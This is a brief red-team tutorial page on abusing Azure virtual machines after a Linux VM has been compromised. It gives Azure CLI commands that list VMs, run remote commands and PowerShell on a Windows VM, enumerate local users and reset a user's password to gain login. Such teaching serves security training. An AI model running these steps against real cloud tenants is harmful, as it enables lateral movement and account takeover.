Skip to main content

Virtual Machine Abuse

This section is highly dependent on the Abusing Managed Identities module so i recommend checking that out first and then coming back to this ʕ •ᴥ•ʔ The setup is the same and the attack assumes you compromised a Linux-based VM and we can use it to execute commands on a Windows VM in the same resource group.

To start, we'll list all the VMs we have access to

~ ∮ az vm list -g DefaultResourceGroup-CUS --output table

In order to execute commands on one of them we can just execute the following

~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id IPConfig

One thing that comes really handy in lateral movement is being able to list users

~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id RunPowerShellScript --scripts Get-LocalUser

now that we know all the existing users on the VM we can reset one of their passwords and use the new one to log in

~ ∮ az vm user update -u <username> -p 'SomethingSecure123!' -n <vm_name> -g DefaultResourceGroup-CUS